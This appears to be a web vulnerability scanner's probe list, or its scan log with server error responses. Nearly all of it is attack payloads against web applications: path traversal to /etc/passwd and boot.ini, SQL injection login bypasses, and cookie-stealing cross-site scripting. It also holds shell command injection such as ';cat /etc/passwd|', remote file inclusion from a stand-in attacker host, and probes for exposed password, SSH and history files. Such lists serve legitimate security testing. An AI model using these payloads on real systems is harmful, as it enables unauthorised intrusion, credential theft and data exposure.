forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=268
forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=100
forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
functions.inc.php+
get_od_toc.pl
globals.php3
globals.pl
Gozila.cgi
helperfunction.php
homebet/homebet.dll?form=menu&amp;option=menu-signin
htmltonuke.php
idealbb/error.asp?|-|0|404_Object_Not_Found
iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
include/customize.php
include/help.php
includes/footer.php3
includes/header.php3
index.php?base=test%20
index.php?IDAdmin=test
index.php?pymembs=admin
index.php?SqlQuery=test%20
index.php?tampon=test%20
index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
infos/contact/index.asp
infos/faq/index.asp
infos/gen/index.asp
infos/services/index.asp
instaboard/index.cfm
intranet/browse.php
invitefriends.php3
ipchat.php
ixmail_netattach.php
jsptest.jsp+
kernel/class/delete.php
kernel/classes/ezrole.php
ldap.search.php3?ldap_serv=nonsense%20
livredor/index.php
login.php3?reason=chpass2%20
mail/include.html
mail/settings.html
mail/src/read_body.php
mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
mambo/banners.php
manage/login.asp+
mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
members/ID.pm
members/ID.xbb
mod.php
modif/delete.php
modif/ident.php
modif_infos.asp?n=%60/etc/passwd%60
modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
modif_infos.asp?n=../../../../../../../../../etc/passwd%00
modif_infos.asp?n=/....../boot.ini
modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
modif_infos.asp?n=/../../../../../../../../../etc/passwd
modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
modif_infos.asp?n=/etc/passwd
modif_infos.asp?n=/etc/passwd%00
modif_infos.asp?n=c:\boot.ini
modules/Downloads/voteinclude.php+
modules/Forums/attachment.php
modules/Search/index.php
modules/WebChat/in.php+
modules/WebChat/out.php
modules/WebChat/quit.php
modules/WebChat/users.php
modules/Your_Account/navbar.php+
moregroupware/modules/webmail2/inc/
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
myguestBk/add1.asp?|-|0|404_Object_Not_Found
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
netget?sid=Safety&amp;msg=2002&amp;file=Safety
newtopic.php
nphp/nphpd.php
OpenTopic
options.inc.php+
oscommerce/default.php
parse_xml.cgi
php/gaestebuch/admin/index.php
php/php4ts.dll
pks/lookup
pm/lib.inc.php
poppassd.php3+
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
productcart/database/EIPC.mdb
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
product_info.php
prometheus-all/index.php
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
protected/
protected/secret.html+
protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
protection.php
pt_config.inc
pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
pvote/del.php?pollorder=1%20
quikmail/nph-emumail.cgi?type=../%00
room/save_item.php
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
screen.php
scripts/tradecli.dll
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
security/web_access.html
sendphoto.php
servers/link.cgi
setpasswd.cgi
shop/php_files/site.config.php+
shop/search.php
shop/show.php
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
Site/biztalkhttpreceive.dll
site_searcher.cgi
spelling.php3+
squirrelmail/src/read_body.php
staticpages/index.php
status.php3
supporter/index.php
supporter/tupdate.php
sw000.asp?|-|0|404_Object_Not_Found
syslog.htm?%20
technote/print.cgi
texis/websearch/phine
tinymsg.php
tmp_view.php?file=/etc/passwd
topic/entete.php
topsitesdir/edit.php
ttforum/index.php
tutos/file/file_new.php
tutos/file/file_select.php
typo3/typo3/dev/translations.php
uifc/MultFileUploadHandler.php+
url.jsp
useraction.php3
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
utils/sprc.asp+
vars.inc+
VBZooM/add-subject.php
wbboard/profile.php
wbboard/reply.php
webcalendar/login.php
webcalendar/view_m.php
webmail/lib/emailreader_execute_on_each_page.inc.php
webmail/src/read_body.php
web_app/WEB-INF/webapp.properties
XMBforum/buddy.php
XMBforum/member.php
x_stat_admin.php
yabbse/Reminder.php
yabbse/Sources/Packages.php
zentrack/index.php
_head.php
cgi-bin/adduser.cgi
cgi-bin/amadmin.pl
cgi-bin/anyboard.cgi
cgi-bin/AT-generate.cgi
cgi-bin/auctiondeluxe/auction.pl
cgi-bin/awl/auctionweaver.pl
cgi-bin/bb-ack.sh
cgi-bin/bb-histlog.sh
cgi-bin/bb-rep.sh
cgi-bin/bb-replog.sh
cgi-bin/bbs_forum.cgi
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/cached_feed.cgi
cgi-bin/calender_admin.pl
cgi-bin/cartmanager.cgi
cgi-bin/cbmc/forums.cgi
cgi-bin/cgforum.cgi
cgi-bin/change-your-password.pl
cgi-bin/clickresponder.pl
cgi-bin/commandit.cgi
cgi-bin/counter-ord
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counterfiglet-ord
cgi-bin/counterfiglet/nc/
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/csNews.cgi
cgi-bin/csPassword.cgi
cgi-bin/csPassword/csPassword.cgi
cgi-bin/cutecast/members/
cgi-bin/day5datanotifier.cgi
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db_manager.cgi
cgi-bin/DCFORMS98.CGI
cgi-bin/dnewsweb
cgi-bin/donothing
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imageFolio.cgi
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/majordomo.pl
cgi-bin/mojo/mojo.cgi
cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
cgi-bin/non-existent.pl
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-maillist.pl
cgi-bin/parse-file
cgi-bin/php-cgi
cgi-bin/pollssi.cgi
cgi-bin/postcards.cgi
cgi-bin/profile.cgi
cgi-bin/quikstore.cfg
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/rightfax/fuwww.dll/?
cgi-bin/rmp_query
cgi-bin/robpoll.cgi
cgi-bin/scripts/*%0a.pl
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/statusconfig.pl
cgi-bin/sws/manager.pl
cgi-bin/texis/phine
cgi-bin/Upload.pl
cgi-bin/utm/admin
cgi-bin/utm/utm_stat
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cgi-bin//_vti_pvt/doctodep.btr
cgi-bin/cfgwiz.exe
cgi-bin/Cgitest.exe
cgi-bin/mailform.exe
cgi-bin/ms_proxy_auth_query/
cgi-bin/post16.exe
oem_webstage/oem.conf
database/
demo/sql/index.jsp
cgi-bin/.htaccess
cgi-bin/.htaccess.old
cgi-bin/.htaccess.save
cgi-bin/.htaccess~
cgi-bin/.htpasswd
cgi-bin/.passwd
.wwwacl
.www_acl
cgi-bin/.wwwacl
cgi-bin/.www_acl
.htpasswd
.access
.addressbook
.bashrc
.bash_history
.forward
.history
.htaccess
.lynx_cookies
.mysql_history
.passwd
.pinerc
.plan
.proclog
.procmailrc
.profile
.rhosts
.sh_history
.ssh
.ssh/authorized_keys
.ssh/known_hosts
cgi-bin/ls
///../../data/config/microsrv.cfg
///////../../../../../../etc/passwd
_vti_bin/shtml.exe/_vti_rpc
doc/rt/overview-summary.html
docs/sdb/en/html/index.html
jservdocs/
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/Language.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/realPath.jsp
tomcat-docs/index.html
cgi-bin/test-cgi.bat
akopia/
bc4j.html
dms0
jspdocs/
mod_ose_docs
ojspdemos/basic/hellouser/hellouser.jsp
ojspdemos/basic/simple/usebean.jsp
ojspdemos/basic/simple/welcomeuser.jsp
oprocmgr-status
php/index.php
pls/portal30/admin_/
pls/simpledad/admin_/
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
search/
servlet/Counter
servlet/DateServlet
servlet/FingerServlet
servlet/HelloWorldServlet
servlet/IsItWorking
servlet/SessionServlet
servlet/SimpleServlet
servlet/SnoopServlet
xdk/
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
admcgi/contents.htm
admcgi/scripts/Fpadmcgi.exe
admisapi/fpadmin.htm
bin/admin.pl
bin/cfgwiz.exe
bin/CGImail.exe
bin/contents.htm
bin/fpadmin.htm
bin/fpremadm.exe
bin/fpsrvadm.exe
cgi-bin/CGImail.exe
cgi-bin/contents.htm
cgi-bin/fpadmin.htm
cgi-bin/fpremadm.exe
scripts/admin.pl
scripts/cfgwiz.exe
scripts/CGImail.exe
scripts/contents.htm
scripts/fpadmin.htm
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
_private/
_private/orders.htm
_private/orders.txt
_private/register.htm
_private/register.txt
_private/registrations.htm
_private/registrations.txt
_private/_vti_cnf/
_vti_bin/
_vti_bin/admin.pl
_vti_bin/cfgwiz.exe
_vti_bin/CGImail.exe
_vti_bin/contents.htm
_vti_bin/fpadmin.htm
_vti_bin/fpremadm.exe
_vti_bin/fpsrvadm.exe
_vti_bin/_vti_cnf/
_vti_cnf/_vti_cnf/
_vti_inf.html
_vti_log/_vti_cnf/
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/service.pwd
_vti_pvt/users.pwd
manual/servlets/scripts/servlet1/servform.htm
manual/servlets/scripts/shoes/shoeform.htm
examples/
examples/context
examples/forward1
examples/forward2
examples/header
examples/include1
examples/info
examples/jsp/index.html
help/contents.htm
help/home.html
manual/ag/esperfrm.htm
nethome/
com/novell/gwmonitor/help/en/default.htm
com/novell/webaccess/help/en/default.htm
com/novell/webpublisher/help/en/default.htm
servlet/AdminServlet
servlet/gwmonitor
servlet/PrintServlet
servlet/SearchServlet
servlet/ServletManager
servlet/sq1cdsn
servlet/sqlcdsn
servlet/webacc
servlet/webpub
WebSphereSamples
cgi-bin/cgi-test.exe
doc/domguide.nsf
doc/dspug.nsf
doc/help4.nsf
doc/helpadmin.nsf
doc/helplt4.nsf
doc/internet.nsf
doc/javapg.nsf
doc/lccon.nsf
doc/migrate.nsf
doc/npn_admn.nsf
doc/npn_rn.nsf
doc/readmec.nsf
doc/readmes.nsf
doc/smhelp.nsf
doc/srvinst.nsf
domguide.nsf
dspug.nsf
help/domguide.nsf
help/dspug.nsf
help/help4.nsf
help/helpadmin.nsf
help/helplt4.nsf
help/internet.nsf
help/javapg.nsf
help/lccon.nsf
help/migrate.nsf
help/npn_admn.nsf
help/npn_rn.nsf
help/readmec.nsf
help/readmes.nsf
help/smhelp.nsf
help/srvinst.nsf
help4.nsf
helpadmin.nsf
helplt4.nsf
internet.nsf
javapg.nsf
lccon.nsf
migrate.nsf
npn_admn.nsf
npn_rn.nsf
readmec.nsf
readmes.nsf
smhelp.nsf
srvinst.nsf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
netbasic/websinfo.bas
perl/env.pl
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
index.html.ca
index.html.cz.iso8859-2
index.html.de
index.html.dk
index.html.ee
index.html.el
index.html.en
index.html.es
index.html.et
index.html.fr
index.html.he.iso8859-8
index.html.hr.iso8859-2
index.html.it
index.html.ja.iso2022-jp
index.html.kr.iso2022-kr
index.html.ltz.utf8
index.html.lu.utf8
index.html.nl
index.html.nn
index.html.no
index.html.po.iso8859-2
index.html.pt
index.html.pt-br
index.html.ru.cp-1251
index.html.ru.cp866
index.html.ru.iso-ru
index.html.ru.koi8-r
index.html.ru.utf8
index.html.se
index.html.tw
index.html.tw.Big5
index.html.var
test
iissamples/issamples/codebrws.asp
iissamples/issamples/ixqlang.htm
iissamples/issamples/Winmsdp.exe
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
iissamples/sdk/asp/docs/Winmsdp.exe
mc-icons/
ns-icons/
cgi-bin/printenv
cgi-bin/test-cgi
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
test.php
test/info.php
info.php
test/phpinfo.php
NetDetector/middle_help_intro.htm
a/
basilix/
bottom.html
interchange/
sca/menu.jsp
icons/
manual/images/
doc/packages/
image/
javax
perl/
scripts
SUNWmc/htdocs/en_US/
search/inc/
images/
docs/
style/
styles/
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
uploader.php
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/exair/howitworks/Winmsdp.exe
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
conspass.chl+
consport.chl+
general.chl+
srvstatus.chl+
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
search.asp?Search=
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
NULL.printer
nul..cfm
nul..dbm
nul.cfm
nul.dbm
cgi-bin/imagemap
cgi-bin/imagemap.exe
cgi-bin/htimage.exe/path/filename?2,2
cgi-bin/htimage.exe
mlog.html
mlog.phtml
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
php/mlog.html
php/mlog.phtml
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
i?/etc/passwd
cfide/administrator/index.cfm
CFIDE/administrator/index.cfm
directory.php?dir=%3Bcat%20/etc/passwd
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
content/base/build/explorer/none.php?/etc/passwd
soapConfig.xml
cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
cgi-bin/GWWEB.EXE?HELP=bad-request
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
XSQLConfig.xml
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
docs/<script>alert('Vulnerable');</script>
docs/NED?action=retrieve&location=.
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
lcgi/ndsobj.nlm
surf/scwebusers
_vti_bin/fpcount.exe
_private/form_results.htm
_private/form_results.html
_private/form_results.txt
scripts/tools/getdrvrs.exe
cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
cgi-bin/vote.cgi
cgi-bin/quizme.cgi
shop/normal_html.cgi?file=../../../../../../etc/issue%00
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
